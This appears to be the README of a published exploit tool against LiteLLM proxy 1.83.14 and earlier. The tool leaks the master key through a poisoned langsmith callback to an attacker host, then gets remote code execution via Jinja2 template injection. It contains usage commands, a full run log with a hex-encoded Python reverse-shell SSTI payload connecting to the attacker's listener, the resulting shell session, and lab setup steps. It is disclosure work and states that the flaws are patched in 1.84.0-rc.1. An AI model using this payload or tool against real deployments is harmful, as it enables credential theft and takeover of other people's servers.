LiteLLM 1.83.14 — Remote Code Execution via Master Key Leak and Jinja2 SSTI
Three-stage exploit tool targeting LiteLLM versions ≤ 1.83.14. Achieves remote code execution (interactive shell or arbitrary command) against a default production deployment given only a standard internal_user API key.
Want to know how it works? Read the blog post RCEliteLLM – LiteLLM 1.83.14: Chaining an Environment Variable Leak with Jinja2 SSTI for Remote Code Execution.
RCEliteLLM.mp4
============================================================================
______ _____ _____ _ _ _ _ _ ___ ___
| ___ \ / __ \ | ___| | | (_) | | | | | | | \/ |
| |_/ / | / \/ | |__ | | _ | |_ ___ | | | | | . . |
| / | | | __| | | | | | __/ _ \ | | | | | |\/| |
| |\ \ | \__/\ | |___ | | | | | || __/ | |____ | |____ | | | |
\_| \_| \____/ \____/ |_| |_| \__\___| \_____/ \_____/ \_| |_/
====================== github.com/McCaulay/RCEliteLLM ======================
usage: RCEliteLLM.py [-h] -k API_KEY -r RHOST [-rp RPORT] [-rs] -l LHOST [-lp LPORT]
[-sp SHELL_PORT] [-m MODEL] [-c COMMAND] [-t TIMEOUT]
[--callback-wait CALLBACK_WAIT] [-mk MASTER_KEY] [-p PROMPT_ID] [-lk]
LiteLLM 1.83.14: RCE via Master Key Leak and Jinja2 SSTI
options:
-h, --help show this help message and exit
-k API_KEY, --api-key API_KEY
A valid LiteLLM API key with internal_user role
-r RHOST, --rhost RHOST
Base URL of the LiteLLM proxy (e.g. 10.0.0.1)
-rp RPORT, --rport RPORT
Port for the LiteLLM proxy (default: 4000)
-rs, --rssl If LiteLLM proxy is using SSL (default: False)
-l LHOST, --lhost LHOST
Attacker IP/hostname reachable from the target
-lp LPORT, --lport LPORT
Attacker listener port for both callback and GitLab server (default:
8888)
-sp SHELL_PORT, --shell-port SHELL_PORT
Reverse shell listener port (default: 31337)
-m MODEL, --model MODEL
Model name for completion calls (default: auto-detected)
-c COMMAND, --command COMMAND
Shell command to execute on target (default: reverse shell)
-t TIMEOUT, --timeout TIMEOUT
HTTP request timeout in seconds (default: 60)
--callback-wait CALLBACK_WAIT
Seconds to wait for the langsmith callback batch (default: 15)
-mk MASTER_KEY, --master-key MASTER_KEY
Skip master key leak if provided (default: auto-leak)
-p PROMPT_ID, --prompt-id PROMPT_ID
Prompt ID for the SSTI payload (default: auto-generated)
-lk, --leak-only Only leak the master key, do not execute commands (default: False)
The following example shows an attacker (192.168.3.95) targeting a victim (192.168.3.78) running LiteLLM 1.83.14. The internal_user API key (sk-GbNPQmzQa_JTP-2N9CQDtg) is used to leak the master key (sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c). The master key is then used in stage 3 to trigger code execution.
user@user:~/$ hostname -I
192.168.3.95
user@user:~/$ python3 RCEliteLLM.py \
--api-key "sk-GbNPQmzQa_JTP-2N9CQDtg" \
--rhost "192.168.3.78" \
--lhost "192.168.3.95"
============================================================================
______ _____ _____ _ _ _ _ _ ___ ___
| ___ \ / __ \ | ___| | | (_) | | | | | | | \/ |
| |_/ / | / \/ | |__ | | _ | |_ ___ | | | | | . . |
| / | | | __| | | | | | __/ _ \ | | | | | |\/| |
| |\ \ | \__/\ | |___ | | | | | || __/ | |____ | |____ | | | |
\_| \_| \____/ \____/ |_| |_| \__\___| \_____/ \_____/ \_| |_/
====================== github.com/McCaulay/RCEliteLLM ======================
[#] LiteLLM Version: 1.83.14
[#] Auto-detected model: smollm2:135m
[#]
[#] Stage 1: Creating poisoned key with langsmith callback
[#] Callback URL: http://192.168.3.95:8888
[+] Poisoned key: sk-4WQ6KS4zjfWJOMfPRrjcnA
[+] callback_vars
[+] langsmith_api_key: LITELLM_MASTER_KEY
[+] langsmith_project: exfil
[+] langsmith_base_url: http://192.168.3.95:8888
[#]
[#] Stage 2: Triggering leak via completion call with poisoned key
[#] Triggered completion call
[#] Waiting for langsmith callback...
[#] 192.168.3.78 POST /api/v1/runs/batch x-api-key=sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c
[+] Leaked master key: sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c
[#] Starting reverse shell listener on 0.0.0.0:31337
[#] Reverse shell listener ready on port 31337
[#]
[#] Stage 3: RCE via Jinja2 SSTI (GitLab prompt integration)
[#] Reverse shell: 192.168.3.95:31337
[#] SSTI payload: {{
cycler.__init__.__globals__['__builtins__']['__import__']('subprocess').Popen(
[
cycler.__init__.__globals__['__builtins__']['__import__']('sys').executable,
'-c',
'import socket,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.3.95",31337));
exec(bytes.fromhex("
5b6f732e6475703228732e66696c656e6f28292c692920666f72206920696e2072616e67652833295d0a69
6d706f7274207074790a7074792e737061776e28272f62696e2f736827290a
").decode())
if sys.platform!="win32" else
exec(bytes.fromhex("
696d706f72742073756270726f636573732c746872656164696e670a703d73756270726f636573732e506f
70656e285b27636d642e657865275d2c737464696e3d73756270726f636573732e504950452c7374646f75
743d73756270726f636573732e504950452c7374646572723d73756270726f636573732e5354444f55542c
62756673697a653d30290a646566207228293a0a207768696c6520547275653a0a2020643d702e7374646f
75742e726561642834303936290a20206966206e6f7420643a627265616b0a2020732e73656e64616c6c28
64290a646566207728293a0a207768696c6520547275653a0a2020643d732e726563762834303936290a20
206966206e6f7420643a627265616b0a2020702e737464696e2e77726974652864293b702e737464696e2e
666c75736828290a743d746872656164696e672e546872656164287461726765743d722c6461656d6f6e3d
54727565290a753d746872656164696e672e546872656164287461726765743d772c6461656d6f6e3d5472
7565290a742e737461727428293b752e737461727428293b742e6a6f696e28290a
").decode())
'
]
)
}}
[#] Creating prompt '7b6b2880-583f-4fe9-986e-15ea21d69d7e' via POST /prompts
[#] 192.168.3.78 GET
/api/v4/projects/1/repository/files/7b6b2880-583f-4fe9-986e-15ea21d69d7e.v1.prompt/raw
[#] Prompt created with id 7b6b2880-583f-4fe9-986e-15ea21d69d7e.v1
[#] Triggering SSTI via LLM call
[#] Triggered completion call
[#]
[#] Waiting for reverse shell connection...
[+] Reverse shell from 192.168.3.78:47430
$ id
uid=1000(victim) gid=1000(victim) groups=1000(victim)
$ hostname -I
192.168.3.78
One-shot command execution:
python3 RCEliteLLM.py \
-k "sk-GbNPQmzQa_JTP-2N9CQDtg" \
-r "192.168.3.78" \
-l "192.168.3.95" \
-c "id > /tmp/poc.txt"Skip the leak stage (master key already known):
python3 RCEliteLLM.py \
-mk "sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c" \
-r "192.168.3.78" \
-l "192.168.3.95" \
-c "id > /tmp/poc.txt"Leak master key only:
python3 RCEliteLLM.py \
-k "sk-GbNPQmzQa_JTP-2N9CQDtg" \
-r "192.168.3.78" \
-l "192.168.3.95" \
--leak-onlypip install litellm==1.83.14
litellm --version
# Expected: litellm, version 1.83.14The exploit requires a database for key management (POST /key/generate) and prompt storage (POST /prompts).
The following example creates a database litellm with the user/pass victim:victim.
# Install PostgreSQL
sudo apt install postgresql
# Create database
sudo -u postgres createdb litellm
sudo -u postgres createuser --superuser victim
sudo -u postgres psql -c "ALTER USER victim WITH PASSWORD 'victim';"The DATABASE_URL will be set to postgresql://victim:victim@127.0.0.1:5432/litellm as an environment variable when starting the proxy.
The exploit needs at least one model configured. Any LLM backend works.
For example, Ollama with a small model can be installed using the following.
curl -fsSL https://ollama.com/install.sh | sh
ollama pull smollm2:135m
ollama serve # runs on port 11434Create litellm_config.yaml containing the model information:
model_list:
- model_name: smollm2:135m
litellm_params:
model: ollama/smollm2:135m
api_base: "http://localhost:11434"Critical: LITELLM_MASTER_KEY must be set as an environment variable. This is the standard practice in Docker/production deployments.
export LITELLM_MASTER_KEY="sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c"
export DATABASE_URL="postgresql://victim:victim@127.0.0.1:5432/litellm"
litellm --config litellm_config.yaml --port 4000Expected output:
INFO: Started server process [12345]
INFO: Waiting for application startup.
...
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:4000
The exploit requires an API key with internal_user role (the standard role for API key holders).
MASTER_KEY="sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c"
# Create a user with internal_user role
curl -X POST http://localhost:4000/user/new \
-H "Authorization: Bearer $MASTER_KEY" \
-H "Content-Type: application/json" \
-d '{"user_id": "developer", "user_role": "internal_user"}'
# Create an API key for this user
curl -X POST http://localhost:4000/key/generate \
-H "Authorization: Bearer $MASTER_KEY" \
-H "Content-Type: application/json" \
-d '{"user_id": "developer"}'The returned key value is the --api-key value for the exploit.
API_KEY="<key from Step 6>"
# Health check
curl http://localhost:4000/health/liveness
# Expected: "I'm alive!"
# Verify key works for completions
curl -X POST http://localhost:4000/v1/chat/completions \
-H "Authorization: Bearer $API_KEY" \
-H "Content-Type: application/json" \
-d '{"model": "smollm2:135m", "messages": [{"role": "user", "content": "hi"}]}'
# Expected: 200 with completion response
# Verify key can create new keys (internal_user role)
curl -X POST http://localhost:4000/key/generate \
-H "Authorization: Bearer $API_KEY" \
-H "Content-Type: application/json" \
-d '{}'
# Expected: 200 with new key details
# Verify LITELLM_MASTER_KEY is in the proxy's environment
cat /proc/$(pgrep -f "litellm" | head -1)/environ | tr '\0' '\n' | grep LITELLM_MASTER_KEY
# Expected: LITELLM_MASTER_KEY=sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8cThe attacker needs:
- Outbound access to the target's proxy port (4000)
- An inbound port accessible from the target (8888) for the callback listener and fake GitLab server
- (Optional) An inbound port accessible from the target (31337) for the reverse shell
The target needs:
- LiteLLM proxy listening on a reachable port (4000)
- Outbound HTTP connectivity to the attacker (for the langsmith callback and fake GitLab API)
Both vulnerabilities are fully patched in LiteLLM 1.84.0-rc.1:
get_secret()removed fromconvert_key_logging_metadata_to_callback(). Newvalidate_no_callback_env_reference()validator blocksos.environ/-prefixed strings in callback config. Langsmith/Langfuse setallow_env_credentials=Falsewhen a custombase_urlis provided.- All prompt managers (GitLab, BitBucket, Arize, Dotprompt, HuggingFace) replaced with
ImmutableSandboxedEnvironment.
This tool targets LiteLLM ≤ 1.83.14 only.